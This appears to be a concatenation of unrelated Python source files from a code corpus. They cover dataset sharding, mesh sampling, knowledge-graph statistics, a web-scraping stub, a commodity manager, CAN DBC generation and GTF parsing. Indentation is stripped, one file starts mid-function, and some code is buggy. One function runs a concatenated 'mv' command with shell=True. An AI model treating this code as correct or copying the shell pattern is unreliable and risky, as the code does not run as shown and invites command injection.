cols.remove("text")
if len(cols) > 0:
dataset[name] = dataset[name].remove_columns(cols)
dataset[name] = dataset[name].filter(
lambda x: len(x["text"].split()) > min_tokens, num_proc=n_proc
)
# print(dataset[name]['text'][0])
print(
"Loading Datasets: There are",
len(dataset[name]),
f"records in {name} dataset.",
data_files,
)
return dataset
class ShardingDataset:
def __init__(
self, corpus, output, dataset, n_shards, n_processes, segmenter, **args
):
self.input_extension = corpus["corpus_filetype"]
corpus_files = corpus["corpus_files"]
corpus_dir = corpus["corpus_dir"]
if corpus_files:
print(type(corpus_files))
if isinstance(corpus_files, str):
corpus_files = {corpus_files: 1}
elif (
isinstance(corpus_files, list)
or type(corpus_files) == omegaconf.listconfig.ListConfig
):
corpus_files = {f: 1 for f in corpus_files}
else:
corpus_files = dict(corpus_files)
corpus_files = {corpus_dir + "/" + f: d for f, d in corpus_files.items()}
else:
corpus_files = {
str(f): 1 for f in Path(corpus_dir).glob("**/*") if f.is_file()
}
assert (
len(corpus_files) > 0
), "The input file list must contain at least one file."
self.input_files = corpus_files
assert n_shards["train"] > 0, "There must be at least one output shard."
# assert n_test_shards > 0, 'There must be at least one output shard.'
self.n_shards = n_shards
self.download_mode = dataset["download_mode"]
self.fraction_test_set = dataset["fraction_test_set"]
if not self.fraction_test_set > 0:
self.n_shards["test"] = 0
self.shuffle_dataset = dataset["shuffle_dataset"]
self.seed = dataset["seed"]
self.min_tokens = dataset["min_tokens"]
if n_processes:
self.n_processes = n_processes
else:
self.n_processes = 7
self.segmenter = segmenter
self.output_dir = Path(output["output_dir"])
if not self.output_dir.is_dir():
self.output_dir.mkdir(parents=True, exist_ok=True)
self.output_name_prefix = output["name_prefix"]
self.output_identifier = output["identifier"]
self.output_file_extension = output["file_extension"]
self.datasets = {} # key: split name, value: dataset
self.output_files = {
"train": {},
"test": {},
} # key: filename, value: list of articles to go into file
self.init_output_files()
# Remember, the input files contain one article per line (the whitespace check is to skip extraneous blank lines)
def load_datasets(self):
from datasets import concatenate_datasets
print("Start: Loading Datasets")
datasets = {"train": [], "test": []}
for input_file, dupe_factor in self.input_files.items():
print(f"processing {input_file} with {dupe_factor} dupe factor")
dset = _load_dataset(
input_file,
extension=self.input_extension,
test_split_percentage=int(self.fraction_test_set * 100),
min_tokens=self.min_tokens,
download_mode=self.download_mode,
num_proc=self.n_processes,
)
# self.datasets[input_file] = dset
for name in dset:
for i in range(dupe_factor):
datasets[name].append(dset[name])
print(f"{i}: adding {len(dset[name])} records in {name} dataset.")
for name in datasets:
if len(datasets[name]) > 0:
self.datasets[name] = concatenate_datasets(datasets[name])
print(f"Concatenating {len(datasets[name])} {name} datasets.")
if self.shuffle_dataset:
for name in self.datasets:
print(f"Shuffling {name} dataset.")
self.datasets[name] = self.datasets[name].shuffle(self.seed)
print("End: Loading Datasets.")
def segment_articles_into_sentences(self):
if not self.datasets:
self.load_articles()
assert (
len(self.datasets["train"]) > 0
), "Please check that input files are present and contain data."
assert self.segmenter[
"_target_"
], "Please check that the segmenter is configured correctly."
print("Start: Sentence Segmentation")
seg = instantiate(self.segmenter)
def segment_into_sentences(examples):
sentences = []
for text in examples["text"]:
sentences += seg.segment_article(text.replace("\t", " "))
sentences.append("")
return {"text": sentences}
num_articles = 0
num_sentences = 0
for name in self.datasets:
num_articles += len(self.datasets[name])
num_proc = min(self.n_processes, len(self.datasets[name]) - 1)
self.datasets[name] = self.datasets[name].map(
segment_into_sentences, batched=True, num_proc=num_proc
)
num_sentences += len(self.datasets[name])
print(
f"Number of articles: {num_articles}, Number of sentences: {num_sentences}"
)
print("End: Sentence Segmentation")
def init_output_files(self):
print("Start: Init Output Files")
for name in self.output_files:
assert (
len(self.output_files[name]) == 0
), "Internal storage self.output_files already contains data."
for i in range(self.n_shards[name]):
filename = (
self.output_name_prefix
+ self.output_identifier[name]
+ "_"
+ str(i)
+ self.output_file_extension
)
self.output_files[name][filename] = None
print("End: Init Output Files")
def distribute_datasets_over_shards(self):
print("Start: Distribute Datasets Over Shards")
for name in self.datasets:
assert (
len(self.datasets[name]) > self.n_shards[name]
), "There are fewer articles than shards. Please add more data or reduce the number of shards requested."
for i, filename in enumerate(self.output_files[name]):
self.output_files[name][filename] = self.datasets[name].shard(
self.n_shards[name], i, contiguous=True
)
for shard in self.output_files[name]:
print(f"{name} shard:", shard, len(self.output_files[name][shard]))
print("End: Distribute Datasets Over Shards")
def write_shards_to_disk(self):
print("Start: Write Shards to Disk")
for name in self.output_files:
for shard in self.output_files[name]:
self.write_single_shard(shard, self.output_files[name][shard])
print("End: Write Shards to Disk")
for split, n in self.n_shards.items():
if n > 0:
if not (self.output_dir / split).is_dir():
(self.output_dir / split).mkdir(exist_ok=True, parents=True)
absolute_dir = str(self.output_dir)
command = (
"mv "
+ absolute_dir
+ "/*"
+ split
+ "*.txt"
+ " "
+ absolute_dir
+ "/"
+ split
)
print(command)
mv_process = subprocess.Popen(command, shell=True)
mv_process.wait()
def write_single_shard(self, shard_name, shard_dataset):
with open(shard_name, mode="w", newline="\n") as f:
for text in shard_dataset["text"]:
f.write(text + "\n")
| StarcoderdataPython |
3363953 | import json
import pytest
from guillotina_volto.behaviors.syndication import ISyndicationSettings
pytestmark = pytest.mark.asyncio
async def test_behaviors(cms_requester):
async with cms_requester as requester:
resp, status = await requester(
"POST",
"/db/guillotina",
data=json.dumps({"id": "doc1", "@type": "Document"}),
)
resp, status = await requester("GET", "/db/guillotina/doc1/@behaviors")
assert status == 200
result = resp[ISyndicationSettings.__identifier__]["properties"]
assert "vocabulary" in result["sort_on"] # noqa
| StarcoderdataPython |
1621746 | import os
import re
import numpy as np
import trimesh
def save_mesh(mesh, save_path):
if isinstance(mesh.visual, trimesh.visual.texture.TextureVisuals):
save_path = os.path.join(os.path.dirname(save_path),
os.path.basename(os.path.splitext(save_path)[0]),
os.path.basename(save_path))
os.makedirs(os.path.dirname(save_path), exist_ok=True)
trimesh.exchange.export.export_mesh(mesh, save_path)
def load_mesh(path, mesh_only=False):
mesh = trimesh.load_mesh(path)
if mesh_only:
mesh = trimesh.Trimesh(vertices=mesh.vertices, faces=mesh.faces)
return mesh
class MeshExtractor:
def extract_mesh(self, *args, **kwargs):
raise NotImplementedError
class MeshIO(dict):
def __init__(self, meshes=None):
if meshes is None:
meshes = {}
self.mesh_path = {}
super().__init__(meshes)
@classmethod
def from_file(cls, key_path_pair: (dict, list)):
mesh_io = cls()
if isinstance(key_path_pair, list):
key_path_pair = {i: p for i, p in enumerate(key_path_pair)}
mesh_io.mesh_path = key_path_pair
return mesh_io
def __getitem__(self, item):
if item not in super().keys():
mesh = load_mesh(self.mesh_path[item], mesh_only=True)
super().__setitem__(item, mesh)
return super().__getitem__(item)
def load(self):
for k in self.mesh_path.keys():
self.__getitem__(k)
return self
def merge(self):
return sum([m for m in self.values()]) if self else trimesh.Trimesh()
def save(self, folder):
os.makedirs(folder, exist_ok=True)
for k, v in self.items():
save_mesh(v, os.path.join(folder, f"{k}.obj"))
#cross product of vectors a and b
def cross(a, b):
x = a[1] * b[2] - a[2] * b[1]
y = a[2] * b[0] - a[0] * b[2]
z = a[0] * b[1] - a[1] * b[0]
return (x, y, z)
# determinant of matrix a
def det(a):
return a[0][0]*a[1][1]*a[2][2] + a[0][1]*a[1][2]*a[2][0] + a[0][2]*a[1][0]*a[2][1] - a[0][2]*a[1][1]*a[2][0] - a[0][1]*a[1][0]*a[2][2] - a[0][0]*a[1][2]*a[2][1]
# unit normal vector of plane defined by points a, b, and c
def unit_normal(a, b, c):
x = det([[1,a[1],a[2]],
[1,b[1],b[2]],
[1,c[1],c[2]]])
y = det([[a[0],1,a[2]],
[b[0],1,b[2]],
[c[0],1,c[2]]])
z = det([[a[0],a[1],1],
[b[0],b[1],1],
[c[0],c[1],1]])
magnitude = (x**2 + y**2 + z**2)**.5
if magnitude == 0.:
return (0., 0., 0.)
else:
return (x/magnitude, y/magnitude, z/magnitude)
#dot product of vectors a and b
def dot(a, b):
return a[0]*b[0] + a[1]*b[1] + a[2]*b[2]
#area of polygon poly
def get_area(poly):
if len(poly) < 3: # not a plane - no area
return 0
total = [0, 0, 0]
for i in range(len(poly)):
vi1 = poly[i]
if i is len(poly)-1:
vi2 = poly[0]
else:
vi2 = poly[i+1]
prod = cross(vi1, vi2)
total[0] += prod[0]
total[1] += prod[1]
total[2] += prod[2]
result = dot(total, unit_normal(poly[0], poly[1], poly[2]))
return abs(result/2)
def calculate_face_area(data):
face_areas = []
for face in data['f']:
vid_in_face = [int(item.split('/')[0]) for item in face]
face_area = get_area(data['v'][np.array(vid_in_face) - 1,:3].tolist())
face_areas.append(face_area)
return face_areas
def sample_pnts_from_obj(data, n_pnts = 5000, mode = 'uniform'):
# sample points on each object mesh.
flags = data.keys()
all_pnts = data['v'][:,:3]
area_list = np.array(calculate_face_area(data))
distribution = area_list/np.sum(area_list)
# sample points the probability depends on the face area
new_pnts = []
if mode == 'random':
random_face_ids = np.random.choice(len(data['f']), n_pnts, replace=True, p=distribution)
random_face_ids, sample_counts = np.unique(random_face_ids, return_counts=True)
for face_id, sample_count in zip(random_face_ids, sample_counts):
face = data['f'][face_id]
vid_in_face = [int(item.split('/')[0]) for item in face]
weights = np.diff(np.sort(np.vstack(
[np.zeros((1, sample_count)), np.random.uniform(0, 1, size=(len(vid_in_face) - 1, sample_count)),
np.ones((1, sample_count))]), axis=0), axis=0)
new_pnt = all_pnts[np.array(vid_in_face) - 1].T.dot(weights)
if 'vn' in flags:
nid_in_face = [int(item.split('/')[2]) for item in face]
new_normal = data['vn'][np.array(nid_in_face)-1].T.dot(weights)
new_pnt = np.hstack([new_pnt, new_normal])
new_pnts.append(new_pnt.T)
random_pnts = np.vstack(new_pnts)
else:
for face_idx, face in enumerate(data['f']):
vid_in_face = [int(item.split('/')[0]) for item in face]
n_pnts_on_face = distribution[face_idx] * n_pnts
if n_pnts_on_face < 1:
continue
dim = len(vid_in_face)
npnts_dim = (np.math.factorial(dim - 1)*n_pnts_on_face)**(1/(dim-1))
npnts_dim = int(npnts_dim)
weights = np.stack(np.meshgrid(*[np.linspace(0, 1, npnts_dim) for _ in range(dim - 1)]), 0)
weights = weights.reshape(dim - 1, -1)
last_column = 1 - weights.sum(0)
weights = np.vstack([weights, last_column])
weights = weights[:, last_column >= 0]
new_pnt = (all_pnts[np.array(vid_in_face) - 1].T.dot(weights)).T
if 'vn' in flags:
nid_in_face = [int(item.split('/')[2]) for item in face]
new_normal = data['vn'][np.array(nid_in_face) - 1].T.dot(weights)
new_pnt = np.hstack([new_pnt, new_normal])
new_pnts.append(new_pnt)
random_pnts = np.vstack(new_pnts)
return random_pnts
def normalize_to_unit_square(points, keep_ratio=True):
centre = (points.max(0) + points.min(0)) / 2.
point_shapenet = points - centre
if keep_ratio:
scale = point_shapenet.max()
else:
scale = point_shapenet.max(0)
point_shapenet = point_shapenet / scale
return point_shapenet, centre, scale
def read_obj(model_path, flags=('v')):
fid = open(model_path, 'r')
data = {}
for head in flags:
data[head] = []
for line in fid:
# line = line.strip().split(' ')
line = re.split('\s+', line.strip())
if line[0] in flags:
data[line[0]].append(line[1:])
fid.close()
if 'v' in data.keys():
data['v'] = np.array(data['v']).astype(np.float)
if 'vt' in data.keys():
data['vt'] = np.array(data['vt']).astype(np.float)
if 'vn' in data.keys():
data['vn'] = np.array(data['vn']).astype(np.float)
return data
def write_obj(objfile, data):
with open(objfile, 'w+') as file:
for item in data['v']:
file.write('v' + ' %f' * len(item) % tuple(item) + '\n')
for item in data['f']:
file.write('f' + ' %s' * len(item) % tuple(item) + '\n')
| StarcoderdataPython |
3376763 | import os
def static():
path = './train2id.txt'
head_dic = {}
tail_dic = {}
cnt = 0
with open(path, 'r') as f:
for raw in f.readlines():
raw = raw.strip().split(' ')
try:
head, tail, r = raw
if head not in head_dic.keys():
head_dic[head] = 1
else:
head_dic[head] = head_dic[head] + 1
if tail not in tail_dic.keys():
tail_dic[tail] = 1
else:
tail_dic[tail] = tail_dic[tail] + 1
except:
cnt = cnt + 1
continue
head_cnt = 0
head_mean = 0
tail_cnt = 0
tail_mean = 0
for key in head_dic.keys():
head_cnt = head_cnt + head_dic[key]
for key in tail_dic.keys():
tail_cnt = tail_cnt + tail_dic[key]
head_mean = head_cnt / len(head_dic.keys())
tail_mean = tail_cnt / len(tail_dic.keys())
print(len(head_dic.keys()))
print(head_mean)
print(len(tail_dic.keys()))
print(tail_mean)
def url2name(number):
with open('./entity2id.txt', 'r') as f:
lines = f.readlines()
for line in lines[1:]:
a, b = line.strip().split(' ')
if int(b) == number:
str = a
print(str)
break
url_path = './fb2w.nt'
# f_write = open('./entity2id.txt', 'w')
print(str)
with open(url_path, 'r') as f:
for line in f.readlines():
line = line.strip().split(' ')
if len(line) == 3:
line.pop(1)
m, url = line
m = '/' + m.split('/')[-1].replace('>', '').replace('.', '/')
url = url[1:-3]
if m == str:
print('\t'.join([m, url]))
break
def pachong(url):
from lxml import etree
import requests
import urllib.parse
import urllib3
from bs4 import BeautifulSoup
import re
import random
import time
import xlwt
requesHeader = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Host': 'www.guidelines-registry.org',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Referer': 'http://www.guidelines-registry.org/guid?lang=zh_CN&page=2&limit=10',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'
}
requesHeader1 = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Cookie': 'SESSION=NzBkZjlhMmYtYjEyNS00NDUyLTg1ZDktOTlkZDYxYTYyMTVi',
'Host': 'www.guidelines-registry.org',
'Referer': 'http://www.guidelines-registry.org/guid?lang=zh_CN',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'
}
http = urllib3.PoolManager(num_pools=10, headers=requesHeader1)
workbook = xlwt.Workbook(encoding='utf-8')
sheet = workbook.add_sheet('Sheet1')
resp2 = http.request('GET', url)
print(resp2.data)
soup2 = BeautifulSoup(resp2.data, "html.parser")
print(soup2)
if __name__ == "__main__":
# static() # 统计数据集信息
# 5438 69 30 (tootsie, BAFTA Award for Best Makeup and Hair, award)
# 268 5438 32(<NAME>., toorsie, film)
# 268 4427 32
# 268 618 32
# 268 7480 32
# 268 1504 32
# 10747 268 8
# 268 2973 32
# 268 7261 32
# 6651 637 13(<NAME>, 法国, 电影地址)
# 6651 293 13
# 6651 816 13 (,danmai,)
# 6651 68 13
# 3494 6651 6(<NAME>, <NAME>, 出演)
# 6651 3028 13
# 6651 1960 26(, 声音编辑器,电影摄制组角色)
# 6571 1155 8 (Brenda Strong, Alfre Woodard, 奖项)
# 1155 6571 3 (Alfre Woodard,Brenda Strong, 获得)
# 2346 6571 8 (<NAME>, Brenda Strong, 奖项)
# 6571 2346 8(Brenda Strong, Brenda Strong, 奖项)
# 3023 6571 8 <NAME>
# 6571 7554 6 (Brenda Strong, Starship Troopers(movie),扮演)
# 7554 1098 26 (Starship Troopers(movie), )
# 8605 2974 84 Priest, <NAME>, produce by
# 291 2974 136 <NAME>: The Spy Who Shagged Me, <NAME>, executive_produced_by
# 9022 2974 136 The Mask, <NAME>, executive_produced_by
# 9022 136 31 The Mask,action film, /film/film/genre
# 3504 9022 6 <NAME>,The Mask,扮演
# 9022 1885 90 The Mask, streaming media(流媒体),film distribution medium
# 69 9022 7 BAFTA Award for Best Makeup and Hair, The Mask, nominated for
# 1224 7261 102 <NAME>, Rush Hour
# 2181 660 102 <NAME>, Grindhouse
# 8883 9143 102 <NAME>, Coming to America
# 7557 3822 102 <NAME>, Willow
# 4204 7539 102
# 8531 5744 102
# 5121 3066 102
# 2561 11402 102 <NAME>, Blade Runner
# 2561 3508 102 <NAME>, Legend
# 1239 761 102
# 5510 1003 102
# 8647 4583 102
# 1917 2460 102 <NAME>, 1941 1-n
# 1917 3950 102 Schindler's List
# 1917 4282 102 <NAME>, <NAME> and the Kingdom of the Crystal Skull
# 1917 928 159 <NAME>, Universal Pictures, 雇佣公司 n-1
# 879 1917 71 Jewish people, <NAME>, 民族 1-n
# 1127 1917 47 Academy Award for Best Director, <NAME>, award_winner n-n
# 1420 1917 45 <NAME>, <NAME>, friendship n-n
# 1420 141 43
# 1420 12777 224 Fayetteville, location of ceremony n-1
# 1420 44 82 Christianity, religion n-1
# 1420 4489 236 Arkansas, jurisdiction of office n-1
# 1420 236 179 president, government position held n-n
#
# 5243 1917 47
# 1917 3950 38
# 1917 4272 38
# 1917 1420 45
# 1917 1127 19
# 1846 1917 47 <NAME> Award
# 1917 1846 19
# 5328 1371 192 <NAME>
# 13858 13158 192 <NAME> <NAME>
# 262 2454 192 <NAME> <NAME>
# 3888 12165 192 <NAME> <NAME>
ll = [1917, 2460, 3950, 4282]
if True:
number = 12165
url2name(number)
else:
for number in ll:
url2name(number) | StarcoderdataPython |
101952 | <gh_stars>0
import pickle
import numpy as np
import csv
infile=open('./labels.dat','rb')
labels=pickle.load(infile)
labels = labels.tolist()
infile = open('../Trapnell_TCC.dat', 'rb')
load = pickle.load(infile)
print('converting to list')
df = load.toarray()
f = open('./TCC.txt', 'w')
writer = csv.writer(f)
for row in df:
print(row)
writer.writerow(row)
| StarcoderdataPython |
146119 | <filename>1-mouth01/project_month01/exe01.py<gh_stars>1-10
class CommodityModel:
def __init__(self, cid=0, name="", price=0, cm=0):
self.cid = cid
self.name = name
self.price = price
self.cm = cm
def __str__(self):
return f"商品名称是{self.name},编号是{self.cid},价格是{self.price},识别码是{self.cm}"
def __eq__(self, other):
return self.cm == other.cm
class CommodityView:
def __init__(self):
self.__controller = CommodityController()
def __display_veiw_menu(self):
print("按1键录入商品信息")
print("按2键显示商品信息")
print("按3键删除商品信息")
print("按4键修改商品信息")
def __select_menu(self):
giao = int(input("请输入按键"))
if giao == 1:
self.__input_commodity_info()
elif giao == 2:
self.__display_commodity_info()
elif giao == 3:
self.__remove_commodity_info()
elif giao == 4:
self.__update_commodity_info()
def __input_commodity_info(self):
ccm = CommodityModel()
ccm.name = input("请输入商品名称:")
ccm.price = int(input("请输入商品价格:"))
ccm.cid = int(input("请输入商品编号:"))
self.__controller.addto_datebase_of_Commodityinfo(ccm)
print("成功!!!")
def main(self):
while 1:
self.__display_veiw_menu()
self.__select_menu()
def __display_commodity_info(self):
for i in self.__controller.list_of_commodity:
print(i)
def __remove_commodity_info(self):
cm = int(input("请输入您要删除的商品的商品识别码:"))
if self.__controller.removed_info(cm):
print("删除成功")
else:
print("删除失败")
def __update_commodity_info(self):
ccm = CommodityModel()
ccm.cm = int(input("请输入您需要修改的商品的编号:"))
ccm.cid = input("请输入商品编号")
ccm.name = input("请输入商名称")
ccm.price = input("请输入商品价格")
if self.__controller.update_info(ccm):
print("修改成功")
else:
print("修改失败")
class CommodityController:
def __init__(self):
self.__list_of_commodity = []
self.number_of_cm = 1000
@property
def list_of_commodity(self):
return self.__list_of_commodity
def addto_datebase_of_Commodityinfo(self, comdity_info):
comdity_info.cm = self.number_of_cm
self.number_of_cm += 1
self.__list_of_commodity.append(comdity_info)
def removed_info(self, cm):
cm1 = CommodityModel(cm=cm)
if cm1 in self.__list_of_commodity:
self.__list_of_commodity.remove(cm1)
return True
else:
return False
def update_info(self, ccm):
for i in self.__list_of_commodity:
if i.cm == ccm.cm:
i.__dict__ = ccm.__dict__
return True
return False
v = CommodityView()
v.main()
| StarcoderdataPython |
4817414 | from dataclasses import asdict
from packet import Packet
class DBC:
# if provided filepath, load DBC tree structure from path
def __init__(self, filepath=None, packets=None, ecu_packets=None):
if packets is not None:
self.packets = packets
self.bus_ids = set()
self.ecu_packets = ecu_packets
for packet in packets:
self.bus_ids.add(packet.bus_id)
return
self.packets = [] # packet list
self.bus_ids = set()
if filepath is not None:
pass
@classmethod
def from_packets_list(cls, packets_data: list, ecu_packets: str) -> "DBC":
packets = []
for data in packets_data:
packet = Packet.from_dict(data)
packets.append(packet)
return cls(packets=packets, ecu_packets=ecu_packets)
def to_dict(self):
data = {"packet": []}
for packet in self.packets:
data["packet"].append(asdict(packet))
return {"file": [data]}
def add_packet(self, packet):
"""
Add packet to dbc
"""
self.bus_ids.add(packet.bus_id)
self.packets.add(packet)
def is_valid(self):
"""
Determine if this is a valid dbc
"""
pass # we don't have invalid dbcs. duh
def __repr__(self):
"""
Custom string representation
"""
packet_strs = []
for packet in self.packets:
packet_strs.append(str(packet))
return """VERSION ""
NS_ :
NS_DESC_
CM_
BA_DEF_
BA_
VAL_
CAT_DEF_
CAT_
FILTER
BA_DEF_DEF_
EV_DATA_
ENVVAR_DATA_
SGTYPE_
SGTYPE_VAL_
BA_DEF_SGTYPE_
BA_SGTYPE_
SIG_TYPE_REF_
VAL_TABLE_
SIG_GROUP_
SIG_VALTYPE_
SIGTYPE_VALTYPE_
BO_TX_BU_
BA_DEF_REL_
BA_REL_
BA_DEF_DEF_REL_
BU_SG_REL_
BU_EV_REL_
BU_BO_REL_
SG_MUL_VAL_
BS_:
BU_: {bus_ids}
{packets}
{ecu_packets}
BA_DEF_ BU_ "TpNodeBaseAddress" HEX 0 65535;
BA_DEF_ BO_ "GenMsgSendType" STRING ;
BA_DEF_ "ProtocolType" STRING ;
BA_DEF_ "NmType" STRING ;
BA_DEF_ BO_ "GenMsgCycleTime" INT 1 10000;
BA_DEF_ BO_ "GenMsgILSupport" ENUM "No","Yes";
BA_DEF_ BU_ "ILUsed" ENUM "No","Yes";
BA_DEF_ "VersionNumber" INT 0 10000;
BA_DEF_ "VersionDay" INT 1 31;
BA_DEF_ "VersionMonth" INT 1 12;
BA_DEF_ "VersionYear" INT 2016 3000;
BA_DEF_ "BusType" STRING ;
BA_DEF_ BO_ "DBC_Author_Contact" STRING ;
BA_DEF_DEF_ "DBC_Author_Contact" "<EMAIL>";
BA_DEF_DEF_ "TpNodeBaseAddress" 0;
BA_DEF_DEF_ "GenMsgSendType" "Cyclic";
BA_DEF_DEF_ "ProtocolType" "";
BA_DEF_DEF_ "NmType" "";
BA_DEF_DEF_ "GenMsgCycleTime" 20;
BA_DEF_DEF_ "GenMsgILSupport" "Yes";
BA_DEF_DEF_ "ILUsed" "Yes";
BA_DEF_DEF_ "VersionNumber" 0;
BA_DEF_DEF_ "VersionDay" 1;
BA_DEF_DEF_ "VersionMonth" 1;
BA_DEF_DEF_ "VersionYear" 2016;
BA_DEF_DEF_ "BusType" "Can";
BA_ "ProtocolType" "AEM Net";
BA_ "NmType" "AEM Net";
BA_ "VersionNumber" 3;
BA_ "VersionDay" 28;
BA_ "VersionMonth" 11;
BA_ "BusType" "CAN";
BA_ "GenMsgCycleTime" BO_ 2180030470 50;
BA_ "GenMsgCycleTime" BO_ 2180030466 16;
BA_ "GenMsgCycleTime" BO_ 2180030465 16;
BA_ "GenMsgCycleTime" BO_ 2180030464 16;
""".format(
bus_ids=" ".join(self.bus_ids), packets="\n\n".join(packet_strs), ecu_packets=self.ecu_packets
)
| StarcoderdataPython |
3201807 | <reponame>ncrnalab/ribofy
"""
Module for handling gtf files
"""
import sys
from collections import defaultdict
import time
import mmap
rids = ["gene_id", "transcript_id", "gene_name"]
class gtf2_info (object):
def __init__ (self, gtf2, pos, feature):
self.positions = pos
self.gtf2 = gtf2
self.feature = feature
#self.fetch = fetch
def get_info (self):
nlines = 0
with open(self.gtf2.gtf_file) as fgtf:
for id in self.positions:
for pos in self.positions[id]:
fgtf.seek (int(pos))
columns = fgtf.readline().strip().split ("\t")
chrom, feature, start, end, strand, info = columns[0], columns[2], columns[3], columns[4], columns[6], columns[8]
if feature == self.feature:
nlines += 1
yield {"id": id, "chrom":chrom, "start":int(start), "end":int(end), "strand":strand, "info":info}
#if nlines == 0:
# yield {"id": "N/A", "chrom": "N/A", "start":-1, "end":-1, "strand":"N/A", "info":"N/A"}
def get_start (self):
return (min ([info["start"] for info in self.get_info ()]))
def get_end (self):
return (max ([info["end"] for info in self.get_info ()]))
def get_coordinates (self):
start = self.get_start ()
end = self.get_end ()
chrom = ",".join (list (set ([info["chrom"] for info in self.get_info ()])))
strand = ",".join (list (set ([info["strand"] for info in self.get_info ()])))
return {"chrom":chrom, "start":start, "end":end, "strand":strand}
def get_exons (self):
exons_s = [info["start"] for info in self.get_info ()]
exons_e = [info["end"] for info in self.get_info ()]
exons_s.sort()
exons_e.sort()
return (exons_s, exons_e)
def get_introns (self):
exons_s, exons_e = self.get_exons ()
introns_s = [exons_e[i] for i in range (len (exons_s)-1)]
introns_e = [exons_s[i+1] for i in range (len (exons_s)-1)]
return (introns_s, introns_e)
def get_length (self):
return len([info for info in self.get_info ()])
def print_feature (self, feature):
for info in self.get_info ():
self.print_info (info, feature)
def print_info (self, info, feature):
print ("\t".join ([info['chrom'], "gtf2", feature, str (info['start']), str(info['end']), ".", info['strand'], ".", info['info']]))
class gtf2 (object):
def __init__ (self, gtf_file, head = -1, verbose = 0):
self.verbose = verbose
self.nexon_lines = 0
self.dtid2pos = defaultdict (list)
self.dgid2tid = defaultdict (list)
self.dgid2name = defaultdict (str)
self.dtid2gid = defaultdict (str)
self.dtid2type = defaultdict (str)
self.dchromstart2tid = defaultdict (str)
self.dchromend2tid = defaultdict (str)
self.dtid2startcodon = defaultdict (int)
self.dtid2startcodon_pos = defaultdict (list)
self.dtid2stopcodon = defaultdict (int)
self.dtid2coord = defaultdict (list)
self.gtf_file = gtf_file
if self.verbose > 0:
print (f"Reading gtf {gtf_file}...", file=sys.stderr)
with open(gtf_file, "r+b") as fgtf:
self.mm = mmap.mmap(fgtf.fileno(), 0, prot=mmap.PROT_READ)
iline = 0
no_transcript = True
for line in iter(self.mm.readline, b""):
iline += 1
# if iline % 10000 == 0:
# print (f"...line {iline}", file=sys.stderr)
if iline > head and head != -1:
break
if line == '':
break
columns = line.decode().strip().split ('\t')
if len (columns) < 8:
continue
chrom, feature, start, end, strand, info = columns[0], columns[2], int(columns[3]), int(columns[4]), columns[6], columns[8]
info_proc = self.get_exon_id (info)
pos = fgtf.tell() - len(line)
pos = self.mm.tell() - len(line)
if info_proc["transcript_id"] == "":
self.dtid2pos[info_proc["gene_id"]].append (pos)
else:
self.dtid2pos[info_proc["transcript_id"]].append (pos)
if feature == "transcript":
no_transcript = False
self.dgid2tid[info_proc["gene_id"]].append (info_proc["transcript_id"])
self.dgid2tid[info_proc["gene_name"]].append (info_proc["transcript_id"])
self.dtid2gid[info_proc["transcript_id"]] = info_proc["gene_id"]
self.dgid2name[info_proc["gene_id"]] = info_proc["gene_name"]
self.dtid2type[info_proc["transcript_id"]] = info_proc["transcript_type"]
elif feature == "exon":
# if transcript feature not in gtf...
self.dtid2gid[info_proc["transcript_id"]] = info_proc["gene_id"]
self.dgid2name[info_proc["gene_id"]] = info_proc["gene_name"]
if no_transcript:
if not info_proc["transcript_id"] in self.dgid2tid[info_proc["gene_id"]]:
self.dgid2tid[info_proc["gene_id"]].append (info_proc["transcript_id"])
self.dchromstart2tid[(chrom,start)] += info_proc["transcript_id"] + ","
self.dchromend2tid[(chrom,end)] += info_proc["transcript_id"] + ","
self.nexon_lines += 1
self.dtid2coord[info_proc["transcript_id"]].append ((chrom, start, end, strand))
elif feature == "start_codon":
start_pos = start if strand == "+" else end
if info_proc["transcript_id"] in self.dtid2startcodon:
existing_pos = self.dtid2startcodon[info_proc["transcript_id"]]
if strand == "+":
start_pos = min (start_pos, existing_pos)
else:
start_pos = max (start_pos, existing_pos)
self.dtid2startcodon[info_proc["transcript_id"]] = start_pos
self.dtid2startcodon_pos[info_proc["transcript_id"]].append ((start, end))
elif feature == "stop_codon":
stop_pos = start if strand == "+" else end
if info_proc["transcript_id"] in self.dtid2stopcodon:
existing_pos = self.dtid2stopcodon[info_proc["transcript_id"]]
if strand == "+":
stop_pos = min (stop_pos, existing_pos)
else:
stop_pos = max (stop_pos, existing_pos)
self.dtid2stopcodon[info_proc["transcript_id"]] = stop_pos
if self.verbose > 0:
print (f"...found {self.nexon_lines} exons", file=sys.stderr)
def fetch (self, query, feature = "exon"):
q = query
if isinstance (query, str):
q = [query]
positions = {}
for qi in q:
positions[qi] = self.dtid2pos[qi]
# for qi in q:
# if qi in self.dgid2tid:
# for tid in self.dgid2tid[qi]:
# positions[tid] = self.dtid2pos[tid]
# else:
# positions[qi] = self.dtid2pos[qi]
return gtf2_info (self, positions, feature)
def get_exon_id (self, info):
r = {"gene_id": "", \
"transcript_id": "", \
"gene_name": "",
"transcript_type": ""}
for i in info.split ("; "):
j = i.strip (" ").split (" ")
if len(j) != 2:
continue
for n in r:
if n == j[0]:
r[n] = j[1].strip("\"")
break
return (r)
#def get_coordinates (self, tid):
# return (self.fetch (tid, "exon").get_coordinates ())
def get_name (self, tid):
gid = self.dtid2gid[tid]
return (self.dgid2name[gid])
def get_type (self, tid):
return (self.dtid2type[tid])
def get_gene_id (self, tid):
return (self.dtid2gid[tid])
def get_gid (self, tid):
return (self.dtid2gid[tid])
def get_startcodon (self, tid):
return self.dtid2startcodon[tid]
def get_startcodon_pos (self, tid):
